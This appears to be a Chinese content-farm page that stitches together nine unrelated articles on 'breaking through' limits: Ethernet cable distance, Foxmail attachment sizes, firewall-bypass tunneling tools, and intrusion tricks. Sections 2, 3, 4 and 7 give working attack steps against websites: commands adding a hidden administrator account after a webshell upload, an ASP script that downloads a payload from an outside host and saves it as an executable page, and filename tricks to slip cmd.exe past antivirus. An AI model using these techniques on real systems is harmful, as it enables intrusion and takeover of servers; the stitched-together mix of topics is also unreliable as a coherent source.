如何突破以太网络连接距离限制

时间：2023年04月15日

来源：小红

编辑：本站小编

下面是小编给各位读者分享的如何突破以太网络连接距离限制，欢迎大家分享。本文原稿由网友“小红”提供。

篇1：如何突破以太网络连接距离限制

有线网络是一个通信稳定而又传输快捷的网络，但同时也是一个受制于空间束缚的网络;无论是10Base-T组网标准的网络，还是100Base-T、1000Base-T组网标准的网络，都有100米的空间传输距离束缚着我们，所以，无论组建什么类型的有线网络都不可避免地受到100米传输距离的束缚，那么面对距离束缚，我们究竟是应该选择默认，还是选择挣脱?事实上，我们完全有办法挣脱距离束缚，让有线网络进一步延伸!

多种原因，让有线网络受到束缚

使用双绞线作为通信介质的有线网络，之所以受到100米空间传输距离的束缚，是由多方面原因引起的。首先网络信号在以双绞线作为通信介质的有线网络中传输时，会受到双绞线自身的电容和电阻的影响而容易发生信号畸变或衰减现象，而且这种信号畸变或衰减幅度往往随着双绞线距离的变长而增大，一旦传输信号的累积畸变或衰减幅度超过一定幅度后，网络信号就无法正常传输了，这么一来距离太长的有线网络自然就不能稳定进行通信了;其次在同一条双绞线上传输的网络信号不但相互之间会产生干扰，而且还会受到双绞线附近电磁波的干扰，当信号干扰达到一定程度后，网络信号的误码率也就会不断提高，最终导致网络无法正常传输信号;第三IEEE 802.3通信标准要求，无论是网卡设备的RJ45端口还是其他网络设备的通信端口，其端口附近的PHY芯片往往只支持100米双绞线的驱动能力，而无法对更远的通信距离提供驱动能力;另外以太网络允许信号传输延迟时间最多只能达到512比特时间，一旦信号延迟时间超过这个标准的话，那么网络就认为信号在传输过程中发生了丢失，或者认为信号传输失败，而当有线网络的传输距离比较远时，信号传输延迟时间就很容易超过512比特时间，这样的话信号要想成功传输就不能传输太长的距离。

多种方法，让有线网络挣脱束缚

通过上面的分析，我们不难看出一旦以双绞线作为通信介质的有线网络信号传输距离超过100米后，可能会出现网络访问速度非常缓慢，信号延迟现象非常明显，严重的话有线网络根本就无法正常稳定传输数据，甚至还会导致整个局域网网络发生瘫痪现象。如此说来，难道我们就无法让有线网络挣脱100米传输距离的束缚了?也许有人会说，当网络布线距离超过100米后，我们使用光纤作为通信介质来组建有线网络不就解决问题了!事实上，对于普通的局域网来说，使用光纤作为通信介质其实是非常不经济的，毕竟光纤的价格要比普通双绞线的价格昂贵许多，就连光纤线路所用的连接端口价格也是相当让人咋舌的。那么使用双绞线作为通信介质的有线网络，其布线距离难道真的不能超过100米距离的限制吗?其实我们从下面几个方面出发，完全可以让有线网络的布线距离延伸得更远一些!

1、着眼品牌设备，增强信号驱动本领

在组建有线网络时，网卡、交换机以及集线器等网络设备对信号的传输驱动“本领”的强弱，直接影响到有线网络布线距离的长短。而选用品牌网络设备时，不但可以保证它们自身质量的稳定性，而且品牌网络设备所拥有的附加功能还能为信号传输提供更强的驱动能力，这个驱动能力不仅仅让网络信号在双绞线上传输100米的距离，甚至能为网络信号传输更远的距离提供“动力”。从有线网络的组网实践来看，选用国际知名品牌的网络设备时，网络信号不但在100米以内的距离传输得很稳定，就是网络传输距离超过100米信号多数情况下也能正常传输;例如，Netcore Net3824NS型号的交换机设备就附带了一种CRC校验功能，该功能可以对网络信号进行超强纠错，有效削减网络传输信号的错误帧，该产品在出厂时就明确宣称可以让网络信号传输距离延伸到150米，

2、着眼合理布线，减少信号衰减损耗

网络传输信道除了由双绞线构成外，还由许许多多的中间接插件和组件组成，这些中间接插件和组件的电气性能也会直接影响信号的传输距离。为了让信息点的传输距离能够布置得更远，我们不但要选用具有良好电气性能的信息模块、水晶头、端接跳线、双绞线以及接线架外，还需要确保所用的中间接插件和组件都尽量来自同一个生产厂家，这样可以确保每一个中间接插件和组件在各个方面的性能上保持兼容和匹配，这么一来整个信号传输通道的阻抗性能和EMC性能就处于稳定状态，那么信号在这样的通道上传输时衰减现象就会得到明显改善，信号延迟传输现象也就不会那么明显了，最终所获得的通信效果就让人满意了。为了最大限度地延长有线网络的布线距离，我们最好应该确保网络传输信道中所用到的中间接插件和组件都是六类产品，毕竟这类产品在减少信号衰减以及降低误码率方面有不错的表现。

另外，在实际布线的过程中，我们还必须严格按照综合布线的标准来对双绞线的走线进行合理布置，绝对禁止在走线过程中对双绞线进行扭曲、挤压或打折，否则双绞线自身的电气性能会受到严重影响，从而导致信号传输时受到严重干扰，最终影响信号的传输距离。在对双绞线进行跳线时，最好不用使用手工制作的方法进行跳线，而应该选用现成的制式产品，毕竟手工跳线时存在一个工艺问题;还有一点需要提醒各位注意的是，在连接中间插件时或其他组件时，一定要保证它们的连接接头处牢靠接触、连接紧密，只有这样才能让信号衰减现象降低到最大程度。

3、着眼传输速率，降低信号传输要求

我们知道，网络信号的传输速度越快时，对网络传输信道的质量要求也就越高，那么信号能够传输的距离也就越短。依照这样的思路，我们可以适当降低一下网络信号的传输速度，那么信号对网络传输信道的质量要求也就降低，信号可以传输的距离也就更远一些了。因此，想办法将网卡和交换机的传输速度从100M下降到10M，将它们的传输模式从全双工修改为半双工，可以有效地延长有线网络的布线距离。例如，在将网卡设备的传输速率修改为10M时，可以先依次单击“开始”/“设置”/“网络连接”命令，打开工作站的网络连接列表窗口，并用鼠标右键单击该窗口中的“本地连接”图标，从弹出的快捷菜单中执行“属性”命令，打开本地连接的属性设置窗口;在该设置窗口的“常规”标签页面的“连接时使用”处，选中当前正在使用的网卡设备，并单击“配置”按钮，打开网卡的参数配置页面;单击该页面中的“高级”标签，进入到如图1所示的标签设置页面，在该页面的“属性”列表中，选中“Link Speed amp; Duplex”选项，在对应该选项的“值”文本框中选中“10Mps/Half Duplex”，再单击“确定”按钮，这样一来本地工作站的指定网卡传输速度就变成10Mps了，网卡传输模式也变成半双工模式了。

4、着眼专用设备，提高传输延伸能力

倘若想让有线网络的布线距离延伸得更远的话，我们必须借助一些专门的网络中转设备，对网络传输信号进行放大增强，提高信号传输的延伸能力。例如，有一种比较经济的网络延伸器，价格只比普通的交换机稍微贵一点点，该设备采用特殊的以太网驱动技术，可以将普通的双绞线布线距离最大延伸到750米左右;有些网络延伸设备自身支持远程供电功能，该功能可以让网络延伸设备在网络传输信道的中间连接位置处不需要外接电源，确保有线网络的延伸更加简便、快捷，而且这些网络延伸设备的使用与连接方式，几乎与集线器、交换机完全相同。也有的高档交换机自身就附带了一种长距离的以太网驱动技术，它们能够让有线网络的布线距离最大延伸到1500米左右，不过它们的价格相对昂贵，正常用于节点分散、超远距离传输的网络环境

篇2：再次突破变态限制

主要写的是突破提权的方法，至于如何上传SHELL呢，我博客前面写过。

有突破一流信息拦截系统的网站，上传个马就不容易，好容易上传了，还不能执行命令，郁闷了..

执行命令提权的时候因为命令里有 net user 被拦截，

我KAO，换个思路。

运行批命令和直接执行命令效果是一样的，它既然不让执行net命令，我运行批命令还不行吗？

立刻动手，在asp马里点[新建文件] 把名字改称hacker.bat 在内容里写上：

net usernet user hacker$ /del

net usernet user hacker$ hacker /add

net localgroup administrators hacker$ /add

OK。保存！

晕！不成功！直接被拦....

郁闷了一会，又想个办法：在本地弄个批命令，然后上传，这拦截系统总不会对文件拦截吧？

OK。上传！

晕！又被拦！...

难道这家伙真到看文件内容？

那它是怎么看的？

给服务器按个OD之类的？

不大现实...真正的EXE 程序想执行命令必然不会把命令原样保持在程序里的，

自己写个程序试试？

晕！没工具...又没经验...

算了

回家看电子书...-的绿盟的文章，好多..

看到个系统输入法漏洞入侵的文章，在文章结尾作者提出了几个问题，后来有高手做了答，

看到这几个问题的答案，偶突然有了突破一流信息拦截系统执行命令的方法..

1、准备提权命令：cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add

2、新建快捷方式，在地址栏写入提权命令

3、上传这个快捷方式

4、在提权工具帮助下运行这个快捷方式.....

5、管理员添加成功....

篇3：突破一流拦截上传限制

普瑞斯特

在我们入侵网站的过程中,有时候提交我们的大马或者其他ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符,既然它不允许我们进行提交,那我们可以采用下载的方法.这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标文件下载到本地服务器中.好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件

Set xPost = CreateObject(“Microsoft.XMLHTTP”)

xPost.Open “GET”,“www.hacksb.cn/1.txt”,False

xPost.Send

Set sGet = CreateObject(“ADODB.Stream”)

sGet.Mode = 3

sGet.Type = 1

sGet.Open()

sGet.Write(xPost.responseBody)

sGet.SaveToFile Server.MapPath(“1.asp”),2

set sGet = nothing

set sPOST = nothing

篇4：短名突破可执行文件上传限制

建立非法文件，利用短名还可以突破360，上传cmd.exe1，其短名为CMD~1.EXE，可当EXE来即可。

目标机MS有文件监控，不能上传asp,asa,exe,com等脚本或可执行文件，

分号漏洞拿到shell后，上传cmd遇到了问题。后来就用短名突破了，提权3389进去后，发现是用macfee，设了文件规则，防止上传木马及可执行程序.

也可以直接上传名为cmd.cao上去，假如杀毒不杀就可以执行

摘自：zeroplace.cn

篇5：用Foxmail突破附件限制

问：我经常需要使用Foxmail 5.0收发大量的带附件的邮件，但是免费邮箱都对附件大小有限制，而且不同的邮箱对于附件大小的限制也不同，这就为我收发附件带来了不便，请问有没有办法突破免费邮箱对附件大小的限制？

答：免费邮箱对于附件的大小都有限制，但是对于文本的大小没有限制，因此可以把附件转化为文本格式发送，有一些软件可以实现这类转换，在这里我就介绍一下使用Foxmail 5.0本身的功能来实现这一转化的方法：按照通常的方式撰写邮件，添加附件并保存，

用Foxmail突破附件限制

，

打开发件箱，选中刚刚保存的邮件，在菜单栏中选择“文件→导出邮件”，保存类型选择为“文本文件（.txt）”，保存到桌面。

打开保存在桌面上的邮件文本，按“Ctrl+A”全选、“Ctrl+C”复制。在Foxmail 5.0中重新写邮件，把复制的内容粘贴进去、保存。然后就可以发送这封邮件了。

在对方收到这封邮件后，可以把信的正文全部选中复制，然后粘贴到记事本中，保存为“邮件.eml）。再使用Foxmail打开收件箱，依次选择“文件→导入邮件”导入“邮件.EML”就可以看到第一步中写的那封信了。

篇6：用Foxmail突破附件限制

通常免费邮箱都有一个附件大小的限制，不过正文好像就没什么限制了，所以我们只要把附件转化成文本放在正文中自然就可以逃过附件大小的限制了。有些软件可以实现文件与文本之间的转换，不过要借用其他软件总比较麻烦，也不方便接收。在此我要介绍的是如何利用Foxmail 5.0本身的功能来实现，其实也很简单。

1. 打开Foxmail 5.0，按正常的方式撰写邮件，添加附件并保存。打开发件箱，选中刚保存的邮件，单击菜单栏中的“文件→导出邮件”，保存类型选择为“文本文件（.txt）”，保存到桌面，如图所示。

2. 双击打开保存在桌面上的邮件文本，按“Ctrl+A”全选、复制。再重新写一封新邮件，把复制的内容粘贴进去、保存。在你可以寄了，这是一封完全没有附件的信，大小则与第一步保存的邮件差不多。

3. 对方收到信以后，把信的正文全部选中复制，打开记事本或Word等文字编辑程序进行粘贴，保存为文本文件（邮件.txt），

然后通过重命名把这个文件的扩展名改为EML（邮件EML），再回到Foxmail中打开收件箱，单击“文件→导入邮件”导入这个EML文件（邮件EML）就可以看到我们第一步写的信了。

如果收信方使用的是Outlook Express那更简单，直接双击重命名后的EML文件就可以直接打开了。用Outlook Express发信也一样可以套用这个方法，不过Outlook Express只能导出EML格式的文件，所以我们需要使用记事本打开进行全选复制，或者先重命名为“.txt”文件后再打开进行复制。

点击阅读更多学院相关文章>>

分享到

篇7：短名突破可执行文件上传限制

建立非法文件，利用短名还可以突破360，上传cmd.exe1，其短名为CMD~1.EXE，可当EXE来即可，

目标机MS有文件监控，不能上传asp,asa,exe,com等脚本或可执行文件。分号漏洞拿到shell后，上传cmd遇到了问题。后来就用短名突破了，提权3389进去后，发现是用macfee，设了文件规则，防止上传木马及可执行程序.

也可以直接上传名为cmd.cao上去，假如杀毒不杀就可以执行。

篇8：突破网络限制七绝技

大多数的企业为了安全原因，在网络中设置有防火墙，这样既可以防止非法用户访问公司局域网内的电脑，同时也可使内部员工访问Internet，管理员一般会设置只允许一定的应用程序穿越防火墙，而常常将例如：ICQ、POP3信件收取、PCAnywhere之类的软件限制掉，

绝技1 ICQProxy

ICQProxy是一个可令ICQ冲破HTTP代理服务器限制的软件，它的工作原理是在你的系统中模拟ICQ服务器，将原来ICQ使用的端口4000改用为端口80，这样ICQ所发送的数据首先送到ICQProxy客户端，再由它通过HTTP代理服务器传送到该软件公司免费的HTTP－Tunnel服务器，接着由该服务器将数据送至真正的ICQ服务器，正是依据这种转发机理，使用户可以正常使用ICQ与朋友们聊天。

提示与技巧：如果你的公司或单位只允许员工浏览网页，可你又想与朋友进行即时聊天，其实不用其他软件便可实现这一愿望，那就是使用微软的MSNMessenger。

绝技2 HTTP－Tunnel

HTTP－Tunnel与ICQProxy同出自一家软件公司，与ICQProxy的原理一样，但它的功能更为强大，可支持任何支持Socks5协议的网络应用程序，用户可利用它来使用ICQ、Oicq、AIM、Yahoo

Messenger、Napster等软件。另外，如果你使用的是ICQ99b，或是遇到ICQ无法使用的情况，可选择ICQProxy。

绝技3 SocksCap32

SocksCap32是由著名的NEC公司开发的透明代理软件（该公司在Socks5的开发上做了大量工作）。它可以使那些基于Windows的通过TCP或者UDP协议通讯的客户端软件自动穿越Socks代理服务器，让几乎所有基于TCP/IP协议的软件（如各种浏览器、下载工具、FTP上传软件等）都能使用Socks代理出国。

你甚至可以用它与其他网络软件结合，通过两次代理访问被屏蔽掉的网站。

绝技4 HTTPPort

现在许多单位不但架设代理服务器，还禁掉了80以外的所有端口，员工们只能进行浏览网页的操作，而FTP、IRC、即时聊天等网络功能则根本无法使用。

HTTPort就是什么这种情况而设计的，它能够以HTTP协议通过内部代理服务器连接到外面的公用Proxy，然后将内容传回来，从而骗过内部Proxy，冲破限制，让用户可以使用其他网络服务，比如：FTP、POP3等。

但令人遗憾的是，该软件不支持UDP，所以ICQ、OICQ也就无法通过它使用了，

绝技5 Socks2HTTP

Socks2HTTP可以将SOCKS5请求转换成HTTP请求，使其能够穿越HTTP代理服务器。由于SOCKS协议允许程序穿过任何端口的防火墙，所以许多软件都选择使用该协议，如：Napster、Gnutella、CRT等。

Socks2HTTP为这些SOCKS客户程序模拟了一个轻巧的SOCKS服务器，使它们可以冲破HTTP代理服务器的限制（支持HTTPPOST模式、可以穿越几乎所有HTTP代理服务器/防火墙），执行相应连接。

该软件的工作原理为：先将Socks请求转换为HTTP请求，然后通过HTTP代理服务器连接到软件的公司主页，接着由它转化成Socks并发送出去。

如果你的公司或单位只允许员工浏览网页，并关掉了80之外的端口，那么SocksHTTP可以解决你的烦恼，用上自己心爱的网络软件，比如上面提到的软件。当然用它也可以上OICQ，不过据说效果不是太好，速度相当慢。

Socks2HTTP也可以在不支持SOCKS的TCP/IP客户端程序中使用，包括Telnet和FTP。另外，如果与下面介绍的SocksCap32配合，效果将会更佳，像以前不能用的FTP、E－Mail、Telnet以及即时聊天等软件都可再获新生。

绝技6 e－BorderClient

我们上面曾提到过NEC公司在Socks5的开发上作了大量工作，而e－Border则是该公司推出的最为完整的Socks解决方案。e－BorderClient是相应的客户端软件，它不仅能够连接到NEC专门的e－Border服务器，还可连接普通Socks5代理服务器。提供强大的Socks5代理调度，还能截取你系统里的所有连接请求，将它们通过代理连接出去。

另外，该软件还可以代理诸如：DiabloII、星际争霸的战网连接和石器时代、万王之王等网络游戏的服务器登录。如果你使用的是局域网或是169而想玩在线游戏，在SocksCap32无能为力时，用它试试，可能会有意外之喜。

相比我们以前曾经介绍过的软件，e－BorderClient的最大特点是，自动截取所有连接请求，这样网络软件无需另行配置就可以通过它连接出去，非常方便。

不过，我们在试用中也发现，当使用软件的探测功能查找e－Border服务器时，却被告知结果为0，这样用户就必须先在网上找到可用的Socks5代理服务器才行，而且这方面的资源相对较少。最后就是，由于该软件对系统进行了深层设置，所以可能会影响某些软件的正常使用。

绝技7 FileGateway

Gateway FileGateway能够让你通过HTTP代理服务器/防火墙上传文件。该软件是一个既是客户端程序，又是服务器端程序的FTP类型的系统，能够让你通过HTTP协议传输文件。

它实际上可以访问并穿越所有类型的代理服务器/防火墙，甚至那些没有提供SOCK支持的也不在话下

<----><---->

篇9：Http通道突破防火墙限制方法

不少公司的防火墙作了较为严格的限制，以至于很多网络服务如QQ、MSN都无法运行，如果你还能够打开网页，那么，使用Http通道软件可以让你突破限制，可以在现有的网络条件中使用任何网络服务，使用Http通道软件可以突破防火墙的限制，利用唯一Http访问的权限获得其他Internet应用。那么什么是通道呢？这里所谓的通道，是指一种绕过防火墙端口屏蔽的通讯方式。防火墙两端的数据包封装在防火墙所允许通过的数据包类型或是端口上，然后穿过防火墙与对方通讯，当封装的数据包到达目的地时，再将数据包还原，并将还原后的数据包转交到相应的服务器上。

www.http-tunnel.com是一个专业提供Http通道服务的公司，通过他们的在线Tunnel Server，局域网内的用户可以使用被防火墙所屏蔽的ICQ、E-mail、PC Anywhere、MSN、 QQ、Napster等软件。

使用Http-tunnel的Tunnel Server必须使用Http-tunnel的客户端程序Http-Tunnel Client，Http-Tunnel Client的免费版本允许40Kb/秒的数据转发服务。

一、程序安装和设置

1.运行下载的安装程序，安装过程比较简单一路Next即可完成。

2.安装完成后，会弹出Configuration（配置）窗口，设置本机的Internet连接，有三个选项：

a) Auto detected（自动检测）：你果你不知道你的机器连接，可以选择这个。

b) No Proxy,only a firewall（直接上网，有防火墙）：使用局域网和直接上网的用户选这个，

c) Specify Proxy（指定代理服务器）：如果你使用代理服务器上网，选这个，同时你还必须输入代理服务器的地址和端口，如果需要用户名和密码还需要一并输入。

3.设置好连接，可以单击Test（测试）按钮，测试一下，如果看到Test successful（测试成功）的提示，就代表你设置的已经完成。

4.程序正常运行后，可以将它最小化，它会在任务栏的提示区内生成一个下图标，单击可还原。

二、设置QQ访问

由于QQ对外访问使用的端口是4000，所以网络管理员通常通过限制端口的使用来限制QQ的访问，下面介绍一下如何设置QQ通过http-tunnel访问Internet。